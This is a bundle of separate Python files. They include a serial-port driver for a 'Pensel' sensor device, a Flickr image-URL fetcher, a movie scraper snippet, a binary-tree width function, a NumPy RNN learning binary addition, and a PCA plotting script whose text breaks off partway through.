        # FIX: log() always uses self.log_lock, but only the serial subclass
        # ever created it — initialize here so every subclass can log safely.
        self.log_lock = threading.Lock()
    # ------ Common Methods ----- #
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        if self.verbose:
            self.log("Cleaning up...")
        self.close(exc_type, exc_val, exc_tb)
    def log(self, string):
        """Thread-safe print with a timestamp prefix."""
        with self.log_lock:
            prepend = datetime.now().strftime("%H:%M:%S.%f ")
            print(prepend + string)
    @staticmethod
    def generate_checksum(list_of_data):
        """Return the two's-complement checksum byte: (256 - sum) & 0xFF."""
        checksum = 0
        for b in list_of_data:
            checksum = (checksum + b) & 0xFF
        checksum = (256 - checksum) & 0xff  # twos complement of a byte
        return checksum
    @staticmethod
    def _print_xyz_packet(header, pkt):
        """Shared pretty-printer for accel/mag packets (dedupes six copies)."""
        print(header)
        print(" Frame #: {}".format(pkt.frame_num))
        print(" Timestamp: {} ms".format(pkt.timestamp))
        print(" X Axis: {}".format(pkt.x))
        print(" Y Axis: {}".format(pkt.y))
        print(" Z Axis: {}".format(pkt.z))
        print("")
    def parse_report(self, reportID, payload, verbose=True):
        """Decode a report payload (a list of byte values) according to its ID.

        Returns a parsed object whose shape depends on the report ID, or
        None (implicitly) for unrecognized IDs.
        """
        # Pack the data to be used in the struct-based parsing functions
        packed_data = struct.pack("B" * len(payload), *payload)
        if reportID == 0x22:
            # FIX: previously passed `payload` (a list of ints) to
            # parse_accel_packet, which needs bytes for struct.unpack.
            pkt = self.parse_accel_packet(packed_data)
            if verbose:
                self._print_xyz_packet(" Accel Packet:", pkt)
            return pkt
        elif reportID == 0x23:
            # FIX: same list-vs-bytes bug as 0x22.
            pkt = self.parse_mag_packet(packed_data)
            if verbose:
                self._print_xyz_packet(" Mag Packet:", pkt)
            return pkt
        elif reportID == 0x24:
            # LSM303DLHC overwrite error counters.
            data = struct.unpack("=IIII", packed_data)
            p = SimpleNamespace(
                accel_pkt_ovrwt=data[0], mag_pkt_ovrwt=data[1],
                accel_hw_ovrwt=data[2], mag_hw_ovrwt=data[3])
            if verbose:
                print(" LSM303DLHC errors:")
                print(" Accel Packet Overwrites: {}".format(p.accel_pkt_ovrwt))
                print(" Mag Packet Overwrites: {}".format(p.mag_pkt_ovrwt))
                print(" Accel Hardware Overwrites: {}".format(p.accel_hw_ovrwt))
                print(" Mag Hardware Overwrites: {}".format(p.mag_hw_ovrwt))
            return p
        elif reportID == 0x28 or reportID == 0x29 or reportID == 0x2A:
            # Bare float triplet.
            data = struct.unpack("fff", packed_data)
            p = SimpleNamespace(x=data[0], y=data[1], z=data[2])
            if verbose:
                print("<{}, {}, {}>".format(p.x, p.y, p.z))
            return p
        elif reportID == 0x30:
            # Pensel Version
            pkt = col.namedtuple("Version", ["major", "minor", "git_hash"])
            p = pkt(*struct.unpack("=BBI", packed_data))
            if verbose:
                print(" Pensel v{}.{}-{}".format(p.major, p.minor, p.git_hash))
            return p
        elif reportID == 0x31:
            # current timestamp
            p = struct.unpack("I", packed_data)[0]
            if verbose:
                print(" Timestamp: {} ms".format(p))
            return p
        elif reportID == 0x33:
            # Switch/button states
            pkt = col.namedtuple("ButtonState", ["switch", "main", "aux"])
            p = pkt(*struct.unpack("=BBB", packed_data))
            if verbose:
                print(" Switch State: {}".format(p.switch))
                print(" Main Button: {}".format("open" if p.main else "pressed"))
                print(" Aux Button: {}".format("open" if p.aux else "pressed"))
            return p
        elif reportID == 0x34:
            # Queue diagnostics (drop/dequeue/queue counters).
            pkt = col.namedtuple("ButtonState", ["bitfields", "dropped", "dequeued", "queued"])
            p = pkt(*struct.unpack("<BIII", packed_data))
            if verbose:
                print("bitfields: \t{}".format(hex(p.bitfields)))
                print("dropped: \t{:,}".format(p.dropped))
                print("dequeued: \t{:,}".format(p.dequeued))
                print("queued: \t{:,}".format(p.queued))
            return p
        elif reportID == 0x81:
            pkt = self.parse_accel_packet(packed_data)
            if verbose:
                self._print_xyz_packet(" Accel Packet:", pkt)
            return pkt
        elif reportID == 0x82:
            pkt = self.parse_mag_packet(packed_data)
            if verbose:
                self._print_xyz_packet(" Mag Packet:", pkt)
            return pkt
        elif reportID == 0x83:
            pkt = self.parse_accel_packet(packed_data)
            if verbose:
                self._print_xyz_packet("Filtered Accel Packet:", pkt)
            return pkt
        elif reportID == 0x84:
            pkt = self.parse_mag_packet(packed_data)
            if verbose:
                self._print_xyz_packet("Filtered Mag Packet:", pkt)
            return pkt
    @staticmethod
    def parse_accel_packet(packed_data):
        """Unpack a 20-byte accel packet: frame (u32), timestamp (u32), x/y/z (f32)."""
        frame_num, timestamp, x, y, z = struct.unpack("IIfff", packed_data)
        return SimpleNamespace(x=x, y=y, z=z, frame_num=frame_num, timestamp=timestamp)
    @staticmethod
    def parse_mag_packet(packed_data):
        """Unpack a 20-byte mag packet: frame (u32), timestamp (u32), x/y/z (f32)."""
        frame_num, timestamp, x, y, z = struct.unpack("IIfff", packed_data)
        return SimpleNamespace(x=x, y=y, z=z, frame_num=frame_num, timestamp=timestamp)
    def get_packet(self):
        """Pop one packet from the listener queue, or None if none arrives in 10 ms."""
        if self.thread.is_alive() is False:
            raise RuntimeError("Thread is dead!!")
        try:
            return self.queue.get(timeout=0.01)
        except Empty:
            pass
        return None
    def get_packet_withreportID(self, reportID, timeout=0.01):
        """
        Returns the first found packet with the given reportID while keeping
        the rest of the packets on the queue in the correct order.
        """
        # check if we've got a correct packet in the queue
        incorrect_packets = []
        correct_pkt = None
        start_time = time.time()
        while time.time() < start_time + timeout:
            pkt = self.get_packet()
            if pkt:
                report, retval, payload = pkt
                # check if it's the correct report
                if reportID == report:
                    correct_pkt = pkt
                    break
                else:
                    incorrect_packets.append(pkt)
            else:
                time.sleep(0.001)
        # put back incorrect packets onto the queue
        for pkt in incorrect_packets:
            self.queue.put(pkt)
        return correct_pkt
    def clear_queue(self):
        """Drain everything currently sitting on the packet queue."""
        while True:
            try:
                self.queue.get(timeout=0.001)
            except Empty:
                if self.verbose:
                    self.log("Queue cleared!")
                break
    def packets_available(self):
        """True if at least one packet is waiting on the queue."""
        return not self.queue.empty()
    # ----- Required Methods ------
    @abc.abstractmethod
    def send_report(self, report_ID, payload=None):
        """
        Sends a report to the pensel and reads back the result
        """
        raise NotImplementedError
    @abc.abstractmethod
    def close(self, exc_type=None, exc_val=None, exc_tb=None):
        raise NotImplementedError
class Pensel(BasePensel):
    """Serial-port transport for the Pensel device.

    Frames are delimited by the 4-byte magic header; a background listener
    thread scans the serial stream and queues decoded packets.
    """
    # Magic bytes marking the start of every frame in both directions.
    MAGIC_NUM_0 = 0xDE
    MAGIC_NUM_1 = 0xAD
    MAGIC_NUM_2 = 0xBE
    MAGIC_NUM_3 = 0xEF
    MAGIC_HEADER = [MAGIC_NUM_0, MAGIC_NUM_1, MAGIC_NUM_2, MAGIC_NUM_3]
    _default_baud = 250000
    def __init__(self, serialport, baudrate, *args, timeout=1, **kwargs):
        super().__init__(*args, **kwargs)
        self.serialport = serialport
        self.TIMEOUT = timeout  # seconds to wait for a report reply
        self.baudrate = baudrate or self._default_baud
        self.log_lock = threading.Lock()
        # Rolling buffer of bytes scanned while hunting for the magic header.
        self._check_for_start_bytes = []
        # open serial port
        if self.verbose:
            self.log("Opening serial port...")
        self.serial = serial.Serial(self.serialport, self.baudrate, timeout=0.5)
        if self.verbose:
            self.log("Opened!")
        # start listening for reports from Pensel
        self._start_listener()
        self._clear_serial = False
    # ----- Public Methods ----- #
    def send_report(self, report_ID, payload=None):
        """
        Sends a report to the pensel and reads back the result
        """
        if report_ID < 0 or report_ID > 127:
            raise ValueError("Report ID {} is out of the valid range!".format(report_ID))
        # Frame: magic header, report ID, payload length, payload, checksum.
        self._serial_write(self.MAGIC_NUM_0)
        self._serial_write(self.MAGIC_NUM_1)
        self._serial_write(self.MAGIC_NUM_2)
        self._serial_write(self.MAGIC_NUM_3)
        self._serial_write(report_ID)
        _bytes = [self.MAGIC_NUM_0, self.MAGIC_NUM_1, self.MAGIC_NUM_2, self.MAGIC_NUM_3, report_ID]
        if payload is None:
            _bytes.append(0)
            self._serial_write(0)
        else:
            _bytes.append(len(payload))
            self._serial_write(len(payload))
            for b in payload:
                if b < 0 or b > 255:
                    raise ValueError("Value in payload out of valid range!")
                _bytes.append(b)
                self._serial_write(b)
        # Checksum time!
        self._serial_write(self.generate_checksum(_bytes))
        # Try to get the response
        retval = None
        payload = None
        start_time = time.time()
        while time.time() - start_time < self.TIMEOUT:
            pkt = self.get_packet_withreportID(report_ID)
            if pkt:
                report, retval, payload = pkt
                break
            else:
                pass
        else:
            # check for timeout
            self.log("WARNING: Timed out waiting for response")
        return retval, payload
    def close(self, exc_type=None, exc_val=None, exc_tb=None):
        """Stop the listener thread and close the serial port."""
        try:
            if self.verbose:
                self.log("Killing thread")
            self.thread_run.clear()
            # wait for it to stop
            while self.thread.is_alive():
                time.sleep(0.01)
        finally:
            if self.verbose:
                self.log("\n\tClosing serial port...\n")
            self.serial.close()
    # ----- Private Methods ----- #
    def _serial_write(self, values_to_write):
        """
        Writes `values_to_write` (a byte value or list of them) to the serial port.
        """
        if self.verbose:
            self.log("Writing 0x{:x} to serial port...".format(values_to_write))
        if type(values_to_write) is not list:
            self.serial.write(bytearray([values_to_write]))
        else:
            self.serial.write(bytearray(values_to_write))
    def _serial_read(self, num_bytes):
        """
        reads `num_bytes` from the serial port. Returns a list of ints
        (possibly shorter than requested on timeout).
        """
        out = self.serial.read(num_bytes)
        if len(out) != num_bytes:
            self.log("WARNING: Didn't get the expected number of bytes")
            self.log(" Received {}, expected {}. Serial port dead?".format(len(out), num_bytes))
        out_list = [int(v) for v in bytearray(out)]
        if self.verbose:
            self.log("Read in: {}".format(" ".join(["{:0>2X}".format(b) for b in out_list])))
        return out_list
    def _serial_clear(self):
        """ Clears the serial buffer of anything received. """
        self.serial.reset_input_buffer()
    def _serial_bytes_available(self):
        """
        Returns the number of bytes in the input buffer.
        """
        return self.serial.in_waiting
    def _start_listener(self):
        # Event used to signal the listener thread to stop.
        self.thread_run = Event()
        self.thread_run.set()
        self.queue = Queue()
        self.thread = threading.Thread(target=self._listener)
        self.thread.start()  # start it off
    def _listener(self):
        """ The threaded listener that looks for packets from Pensel. """
        while self.thread_run.is_set():
            # Only attempt a parse once a full header could be present.
            if self._serial_bytes_available() >= len(self.MAGIC_HEADER) and \
                    self._check_for_start():
                report, retval, payload = self._receive_packet()
                if report >= 0:
                    self.queue.put((report, retval, payload))
                    if self.verbose:
                        self.log("Put report {} on queue".format(report))
    def _check_for_start(self):
        """
        Checks for the start of a reply from Pensel by scanning one byte at a
        time for the 4-byte magic header.
        """
        while self._serial_bytes_available():
            data = self._serial_read(1)
            if len(data) == 1:
                self._check_for_start_bytes.append(data[0])
                try:
                    # Match the last four scanned bytes against the header.
                    if self._check_for_start_bytes[-1] == self.MAGIC_NUM_3 and \
                            self._check_for_start_bytes[-2] == self.MAGIC_NUM_2 and \
                            self._check_for_start_bytes[-3] == self.MAGIC_NUM_1 and \
                            self._check_for_start_bytes[-4] == self.MAGIC_NUM_0:
                        if self.verbose:
                            self.log("Start Detected!")
                        return True
                except IndexError:
                    # Fewer than four bytes scanned so far.
                    pass
            else:
                break
        # default, no start :(
        if self.verbose:
            self.log("Failed to detect start...")
        return False
    def _receive_packet(self):
        """
        Receives a packet, whether from a report reply or an input report,
        from Pensel. Doesn't check for start of packet. That's `check_for_start`
        """
        report = self._serial_read(1)
        if len(report) != 1:
            self.log("ERROR: Didn't read back a report!")
            report = -1
        else:
            report = report[0]
        retval = self._serial_read(1)
        if len(retval) != 1:
            self.log("ERROR: Didn't read back a return value!")
            retval = -1
        else:
            retval = retval[0]
        return_payload_len = self._serial_read(1)
        if len(return_payload_len) != 1:
            self.log("ERROR: Didn't read back a return payload length!")
            return_payload_len = 0
        else:
            return_payload_len = return_payload_len[0]
        if return_payload_len != 0:
            return_payload = self._serial_read(return_payload_len)
        else:
            return_payload = []
        checksum = self._serial_read(1)
        if len(checksum) != 1:
            self.log("ERROR: Didn't read back a checksum!")
            checksum = -1
        else:
            checksum = checksum[0]
        # Verify the frame checksum over header + fields + payload.
        data = self.MAGIC_HEADER + [report, retval, return_payload_len] + return_payload
        data.append(checksum)
        our_checksum = self.generate_checksum(data[:-1])
        if our_checksum != checksum:
            self.log("ERROR: Our checksum didn't calculate properly! "
                     "(Calculated {}, expected {})".format(our_checksum, checksum))
            return -1, checksum, []
        else:
            if self.verbose:
                self.log("Checksum match! ({} == {})".format(our_checksum, checksum))
        return report, retval, return_payload
class PenselPlayback(BasePensel):
    """Pensel backend that replays packets recorded to a file instead of
    talking to real hardware. Parsed reports are pushed onto the same
    queue the live backend uses, so consumers see no difference."""
    def __init__(self, playback_file, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.playback_file = playback_file  # path to the recorded packet stream
        self._start_listener()
    def send_report(self, report_ID, payload=None):
        # Playback is one-way: there is no device to receive a report.
        raise RuntimeError("Cannot send a report to a playback file!")
    def close(self, exc_type=None, exc_val=None, exc_tb=None):
        # Signal the listener thread to stop. NOTE(review): the thread is
        # not joined here — confirm callers don't rely on it having exited.
        self.thread_run.clear()
    def _start_listener(self):
        # Event gates the listener loop; queue carries parsed packets.
        self.thread_run = Event()
        self.thread_run.set()
        self.queue = Queue()
        self.thread = threading.Thread(target=self._listener)  # , args=(self,)
        self.thread.start()  # start it off
    def _listener(self):
        """ The threaded listener that looks for packets from Pensel. """
        # Record format: [length byte][length bytes: report, retval, payload...]
        with open(self.playback_file, "rb") as f:
            while self.thread_run.is_set():
                length = f.read(1)
                if len(length) == 0:
                    # out of data
                    break
                length = length[0]
                data = f.read(length)
                if len(data) != length:
                    raise RuntimeError("Didn't receive the expected amount of bytes!")
                # iterating over bytes gives us ints
                report = data[0]
                retval = data[1]
                payload = [d for d in data[2:]]
                if report >= 0:
                    self.queue.put((report, retval, payload))
                    if self.verbose:
                        self.log("Put report {} on queue".format(report))
        # Give consumers a chance to drain everything we queued.
        if self.verbose:
            self.log("Waiting for queue to empty...")
        while self.packets_available():
            time.sleep(0.01)
# ----- Helpful standalone methods
def find_ports(dev_path="/dev/"):
    """Return device names under *dev_path* that look like serial ports.

    A name qualifies when it contains the substring "cu." (macOS
    callout-device naming). *dev_path* defaults to /dev/ but is now a
    parameter so the scan location can be overridden (and tested).
    """
    return [name for name in os.listdir(dev_path) if "cu." in name]
def choose_port(list_of_ports):
    """Interactively prompt the user to pick one entry from *list_of_ports*.

    Loops until a valid selection is made and returns the chosen port
    string. Rejects non-integer input AND out-of-range indices —
    including negative ones, which previously wrapped around and
    silently returned the wrong port.
    """
    print("\nPorts:")
    for ind, port in enumerate(list_of_ports):
        print("\t{}: {}".format(ind, port))
    while True:
        try:
            choice = int(input("Which port do you choose? "))
        except Exception:
            print("Invalid choice.")
            continue
        if 0 <= choice < len(list_of_ports):
            return list_of_ports[choice]
        print("Invalid index.")
def run_command(cmd, print_output=True):
    """
    Kicks off a subprocess to run and accumulate the stdout of the process.

    Returns (stdout, stderr, returncode). Both pipes are drained through
    daemon reader threads so neither can block the other.
    """
    def enqueue_output(out, queue):
        # Pump one pipe into a queue, line by line, until EOF.
        for line in iter(out.readline, b''):
            queue.put(line.decode("utf-8"))
        out.close()
    print(" -> {}".format(cmd))
    # NOTE(review): shell=True means `cmd` is interpreted by the shell —
    # only pass trusted strings here.
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    q_stdout = Queue()
    q_stderr = Queue()
    t_stdout = Thread(target=enqueue_output, args=(proc.stdout, q_stdout))
    t_stderr = Thread(target=enqueue_output, args=(proc.stderr, q_stderr))
    t_stderr.daemon = True  # thread dies with the program
    t_stdout.daemon = True
    t_stdout.start()
    t_stderr.start()
    stdout = ""
    stderr = ""
    # read stdout and stderr without blocking
    finished = False
    while True:
        done = proc.poll()
        try:
            line_stdout = ""
            while True:
                line_stdout += q_stdout.get(timeout=0.01)
        except Empty:
            pass
        # accumulate stdout and print if we should
        stdout += line_stdout
        if print_output and line_stdout != "":
            sys.stdout.write(bcolors.COLOR_CYAN)
            for line in line_stdout.splitlines():
                sys.stdout.write("\t{}\n".format(line))
            sys.stdout.write(bcolors.COLOR_NC)
            sys.stdout.flush()
        try:
            line_stderr = ""
            while True:
                line_stderr += q_stderr.get(timeout=0.01)
        except Empty:
            pass
        # accumulate stderr and print if we should
        stderr += line_stderr
        if print_output and line_stderr != "":
            sys.stderr.write(bcolors.COLOR_RED)
            for line in line_stderr.splitlines():
                sys.stderr.write("\t{}\n".format(line))
            sys.stderr.write(bcolors.COLOR_NC)
            sys.stderr.flush()
        # check if we're done and the finished flag is set
        if finished:
            # Dump accumulated stderr on failure even in quiet mode.
            if done != 0 and print_output is False:
                sys.stderr.write(bcolors.COLOR_RED)
                for line in stderr.splitlines():
                    sys.stderr.write("\t{}\n".format(line))
                sys.stderr.write(bcolors.COLOR_NC)
                sys.stderr.flush()
            return stdout, stderr, done
        # check if the process is done...
        if done is not None:
            finished = True
            # give the process's stdout and stderr time to flush
            time.sleep(0.25)
|
from pprint import pprint
from bs4 import BeautifulSoup
import requests
import json
from Task4 import *
top_movies = scrape_top_list()


def get_movie_list_details(movie_list):
    """Scrape the detail page for every movie dict in *movie_list*.

    Each entry must carry a 'url' key; returns the scraped detail dicts
    in the same order. (Replaces the index-counter while-loop and the
    parallel URL list with a single comprehension.)
    """
    return [scrape_movie_details(movie['url']) for movie in movie_list]


get_movie_list_details(top_movies[:178])
|
"""
VERSION
- Python 3
FUNCTION
- Write image urls to files
"""
import os
import pandas as pd
import requests
import multiprocessing
from optparse import OptionParser
import pickle as pkl
op = OptionParser()
# optparse maps the builtin `str` to its "string" option type.
op.add_option('--clss', action='store', type=str,
              help='The image class (e.g., vietnam war).')
(opts, args) = op.parse_args()
# Input: pickled id map per class; output: one .pkl per image id.
PATH_HOME = os.path.expanduser('~') + '/Projects/iow/'
PATH_DATA = PATH_HOME + 'data/IR/flickr/ids_image/'
NAME_DATA_FILE = 'ids_' + opts.clss + '.pkl'
PATH_OUT = PATH_HOME + 'data/IR/flickr/urls_image/' + opts.clss + '/'
KEY_API = ''  # NOTE(review): the Flickr API key must be filled in before use.
N_THREADS = 16  # worker processes for the multiprocessing pool
SIZE_IMAGE = 7  # index into Flickr's getSizes list — presumably a large size; confirm
if not os.path.exists(PATH_OUT):
    os.makedirs(PATH_OUT)
# ___________________________________________________________________________
def retrieve_image(lock, ns, id_image):
    """Fetch the URL of one Flickr image and pickle it under PATH_OUT.

    *lock*/*ns* come from a multiprocessing.Manager: ns.counter_total
    counts attempts, ns.counter successful writes. Errors are printed
    and swallowed so one bad id cannot kill the pool (kept from the
    original best-effort design).
    """
    try:
        with lock:
            ns.counter_total += 1
        if os.path.exists(PATH_OUT + '/' + id_image + '.txt'):
            print('Exit: The file already exists: %s' % (id_image))
            return
        # Ask Flickr for the available sizes and take SIZE_IMAGE's URL.
        url_image_info = 'https://api.flickr.com/services/rest/' \
                         '?method=flickr.photos.getSizes' \
                         '&format=json&nojsoncallback=?' \
                         '&api_key=%s&photo_id=%s' \
                         % (KEY_API, id_image)
        response = requests.get(url_image_info)
        json_response = response.json()
        url_image = json_response['sizes']['size'][SIZE_IMAGE]['source']
        # Persist the url/name pair; `with` closes the file handle that
        # the original version leaked.
        info_image = {}
        info_image['url'] = url_image
        info_image['name'] = id_image + '.jpg'
        name_image_file = id_image + '.pkl'
        print('Writing: %s' % name_image_file)
        with open(PATH_OUT + name_image_file, 'wb') as fh_out:
            pkl.dump(info_image, fh_out)
        with lock:
            ns.counter += 1
    except Exception as e:
        print(e)
        return
# ___________________________________________________________________________
def main():
    """Fan the image-id list out over a process pool and report totals."""
    from functools import partial
    dict_ids = pd.read_pickle(PATH_DATA + NAME_DATA_FILE)
    ids_image = dict_ids['data'].keys()
    # Manager-backed shared state so workers can bump the counters.
    manager = multiprocessing.Manager()
    ns = manager.Namespace()
    ns.counter = 0
    ns.counter_total = 0
    lock = manager.Lock()
    func = partial(retrieve_image, lock, ns)
    # The context manager terminates and joins the pool — the original
    # left the pool open.
    with multiprocessing.Pool(N_THREADS) as processes:
        processes.map(func, ids_image)
    print('The retrieval is finished (%d/%d).'
          % (ns.counter, ns.counter_total))
if __name__ == '__main__':
    main()
|
class TreeNode(object):
    """Node of a binary tree: a payload plus optional left/right children."""

    def __init__(self, x):
        self.val = x
        # Children start empty; callers wire them up explicitly.
        self.left = self.right = None
def widthOfBinaryTree(root):
    """Return the maximum width of the binary tree rooted at *root*.

    Width of a level is the distance between its leftmost and rightmost
    non-null nodes, counting the null slots in between (LeetCode 662).
    Each node is addressed as in a heap: children of index i sit at
    2*i and 2*i + 1.
    """
    if not root:
        return 0
    best = 1
    level = [(root, 0)]
    while level:
        indices = [idx for _, idx in level]
        best = max(best, indices[-1] - indices[0] + 1)
        nxt = []
        for node, idx in level:
            if node.left:
                nxt.append((node.left, idx * 2))
            if node.right:
                nxt.append((node.right, idx * 2 + 1))
        level = nxt
    return best
# Demo tree:        1
#                 /   \
#                3     2
#               / \     \
#              5   3     9
root = TreeNode(1)
root.left = TreeNode(3)
root.right = TreeNode(2)
root.left.left = TreeNode(5)
root.left.right = TreeNode(3)
root.right.right = TreeNode(9)
widthOfBinaryTree(root)  # widest level is the bottom one
|
import copy
import numpy as np
np.random.seed(1)
def sigmoid(x):
    """Logistic function: squashes any real input into (0, 1)."""
    return 1.0 / (1.0 + np.exp(-x))
def sigmoid_derivative(x):
    """Derivative of the logistic function expressed in terms of its
    output value x = sigmoid(t): d/dt sigmoid(t) = x * (1 - x)."""
    return x * (1 - x)
#dataset generation
# Lookup table: integer -> its 8-bit binary representation (uint8 row).
int2binary = {}
binary_dim = 8
largest_number = pow(2,binary_dim)
binary = np.unpackbits(np.array([range(largest_number)],dtype=np.uint8).T,axis=1)
for i in range(largest_number):
    int2binary[i] = binary[i]
#input variables
alpha = 0.1       # learning rate
input_dim = 2     # two input bits per time step (one from a, one from b)
hidden_dim = 16   # recurrent hidden-state size
output_dim = 1    # one predicted sum bit per time step
#initialize weights between (-1,1)
w0 = 2*np.random.random((input_dim,hidden_dim)) - 1    # input -> hidden
w1 = 2*np.random.random((hidden_dim,output_dim)) - 1   # hidden -> output
w2 = 2*np.random.random((hidden_dim,hidden_dim)) - 1   # hidden -> hidden (recurrent)
# Gradient accumulators, applied once per training example.
dw0 = np.zeros_like(w0)
dw1 = np.zeros_like(w1)
dw2 = np.zeros_like(w2)
#training
for j in range(10000):
    #generate a simple addition a + b = c
    # Operands are capped at half the range so the sum still fits 8 bits.
    a_int = np.random.randint(largest_number/2)
    a = int2binary[a_int]
    b_int = np.random.randint(largest_number/2)
    b = int2binary[b_int]
    #true value
    c_int = a_int+b_int
    c = int2binary[c_int]
    #store the guess
    d = np.zeros_like(c)
    error = 0
    layer_2_deltas = list()
    layer_1_values = list()
    layer_1_values.append(np.zeros(hidden_dim))
    #moving along the binary coding (forward pass, least-significant bit first)
    for p in range(binary_dim):
        #generate input and output
        X = np.array([[a[binary_dim - p -1] ,b[binary_dim - p -1]]])
        y = np.array([[c[binary_dim - p -1]]]).T
        #hidden layer = input + prev_hidden
        layer_1 = sigmoid(np.dot(X,w0) + np.dot(layer_1_values[-1],w2))
        #output layer
        layer_2 = sigmoid(np.dot(layer_1, w1))
        #backprop
        layer_2_error = y - layer_2
        layer_2_deltas.append((layer_2_error)*sigmoid_derivative(layer_2))
        error += np.abs(layer_2_error[0])
        #estimate value
        d[binary_dim - p - 1] = np.round(layer_2[0][0])
        #store hidden layer to use it in the next time step
        layer_1_values.append(copy.deepcopy(layer_1))
    # Backward pass: walk the time steps in reverse (BPTT).
    future_layer_1_delta = np.zeros(hidden_dim)
    for p in range(binary_dim):
        X = np.array([[a[p],b[p]]])
        layer_1 = layer_1_values[-p-1]
        prev_layer_1 = layer_1_values[-p-2]
        #error at output layer
        layer_2_delta = layer_2_deltas[-p-1]
        #error at hidden layer
        layer_1_delta = (future_layer_1_delta.dot(w2.T) + layer_2_delta.dot(w1.T)) * sigmoid_derivative(layer_1)
        #weight update (accumulated here, applied after the loop)
        dw1 += np.atleast_2d(layer_1).T.dot(layer_2_delta)
        dw2 += np.atleast_2d(prev_layer_1).T.dot(layer_1_delta)
        dw0 += X.T.dot(layer_1_delta)
        future_layer_1_delta = layer_1_delta
    # Apply and then reset the accumulated gradients.
    w0 += dw0 * alpha
    w1 += dw1 * alpha
    w2 += dw2 * alpha
    dw0 *=0
    dw1 *=0
    dw2 *=0
    #print progress
    if(j%1000 ==0):
        print("Error : " + str(error))
        print("Prediction : "+ str(d))
        print("True Value : " + str(c))
        # Decode the predicted bit vector back to an integer.
        out = 0
        for index,x in enumerate(reversed(d)):
            out += x*pow(2,index)
        print(str(a_int)+ " + " + str(b_int)+ " = " + str(out))
        print("--------")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os.path
import glob
import numpy as np
from scipy.special import erfinv
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from matplotlib.patches import Ellipse
from collections import OrderedDict
# Choose exactly one (input file, plot title, glyph scale) configuration:
input_file, title, scale_of_the_scales = ('dataset_procrustes.txt', 'PCA - Positions', .06)
#input_file, title, scale_of_the_scales = ('distances.txt', 'PCA - Distances', .06)
#input_file, title, scale_of_the_scales = ('angles.txt', 'PCA - Angles', 3.)
#input_file, title, scale_of_the_scales = ('all_data.txt', 'PCA - Positions, Angles and Distances', 0.06)
plot_type = 'scales' # '2d', '3d' or 'scales'
annotation = True  # label every sample with its species string
colors = ['#ffdb1d', '#629ea0', '#601047']
legend_labels = ['unilobate', 'trilobate', 'pentalobate']
points_file = 'dataset_procrustes.txt'  # outlines used as markers in 'scales' mode
aspect_ratio = 1.
def parse_data_file(filename):
    '''Parse a CSV data file into (species names, feature matrix, labels).

    The first line is a header and is skipped. Each remaining line is
    "speciesN,v1,v2,..." where the trailing digit N of the species field
    is the numeric class label.
    '''
    names, features, labels = [], [], []
    with open(filename, 'r') as fd_in:
        all_lines = fd_in.readlines()
    for line in all_lines[1:]:
        fields = line.split(',')
        species = fields[0]
        features.append([float(v.strip()) for v in fields[1:]])
        names.append(species[:-1])
        labels.append(int(species[-1]))
    return names, np.array(features), np.array(labels)
# Load the configured dataset once at import time.
S, X, y = parse_data_file(input_file)
def getConfidenceEllipse(X, color='black', p=0.9):
    '''Build an (unfilled) covariance confidence ellipse for 2-D data.

    X is an (n, 2) array of points; p the confidence level. `color`
    now has a default so call sites that omit it (the '3d' branch)
    no longer raise a TypeError.

    NOTE(review): the angle uses arccos of a single eigenvector
    component, which drops the rotation's sign — confirm orientation is
    acceptable for these plots.
    '''
    xs, ys = X[:, 0], X[:, 1]
    eigvals, eigvecs = np.linalg.eig(np.cov(xs, ys))
    radii = np.sqrt(eigvals)
    # Gaussian quantile for the requested confidence level.
    z = np.sqrt(2) * erfinv(p)
    ell = Ellipse(xy=(np.mean(xs), np.mean(ys)),
                  width=radii[0] * z * 2, height=radii[1] * z * 2,
                  angle=np.rad2deg(np.arccos(eigvecs[0, 0])))
    ell.set_facecolor('none')
    ell.set_edgecolor(color)
    return ell
print(X.shape)
# Re-encode raw labels as 0..k-1 indices into colors/legend_labels.
labels, y = np.unique(y, return_inverse=True)
pca = PCA()
Xpca = pca.fit_transform(X)
# Explained-variance summary table.
print('=================================================')
print(' PC Eigenvalues % of total var ')
print('-------------------------------------------------')
for i, (eigv, r) in enumerate(zip(pca.explained_variance_, pca.explained_variance_ratio_)):
    print(' {: >2d} {: >8.3f} {: >5.2f}'.format(i+1, eigv, 100*r))
print('=================================================')
plt.rcParams['svg.fonttype'] = 'none'  # keep text editable in SVG exports
if plot_type == '3d':
    from mpl_toolkits.mplot3d import Axes3D
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    for i in range(len(labels)):
        mask = (y == i)
        # NOTE(review): `color` is omitted here and `ell` is never added
        # to the axes — this branch looks broken unless
        # getConfidenceEllipse grows a default color; confirm.
        ell = getConfidenceEllipse(Xpca[mask])
        ax.scatter(Xpca[mask,0], Xpca[mask,1], Xpca[mask,2], color=colors[i])
    if annotation:
        for i, x in enumerate(Xpca):
            ax.annotate(S[i], x[:2], size='x-small', xytext=(6,2), textcoords='offset pixels')
    ax.legend(legend_labels)
    plt.title(title)
    plt.show()
elif plot_type == '2d':
    fig = plt.figure()
    ax = fig.add_subplot(111)
    for i in range(len(labels)):
        mask = (y == i)
        # One confidence ellipse per class, drawn under the scatter.
        ell = getConfidenceEllipse(Xpca[mask], color=colors[i])
        ax.add_artist(ell)
        plt.scatter(Xpca[mask,0], Xpca[mask,1], color=colors[i])
    if annotation:
        for i, x in enumerate(Xpca):
            plt.annotate(S[i], x[:2], size='x-small', xytext=(6,2), textcoords='offset pixels')
    plt.legend(legend_labels)
    plt.title(title)
    plt.show()
elif plot_type == 'scales':
    fig = plt.figure()
    ax = fig.add_subplot(111)
    # Use each sample's raw outline coordinates as its plot glyph.
    _, points, _ = parse_data_file(points_file)
    for i in range(len(labels)):
        mask = (y == i)
        ell = getConfidenceEllipse(Xpca[mask], color=colors[i])
        ax.add_artist(ell)
    for i in range(len(Xpca)):
        polygon = points[i].reshape(-1, 2)
        # Flip vertically, apply aspect ratio, then scale and translate
        # the outline onto its PCA coordinates.
        polygon[:,1] = -polygon[:,1]
        polygon[:,0] = aspect_ratio * polygon[:,0]
        polygon = polygon * scale_of_the_scales + Xpca[i,:2]
        plt.fill(polygon[:,0], polygon[:,1], color=colors[y[i]], label=legend_labels[y[i]])
    if annotation:
        for i, x in enumerate(Xpca):
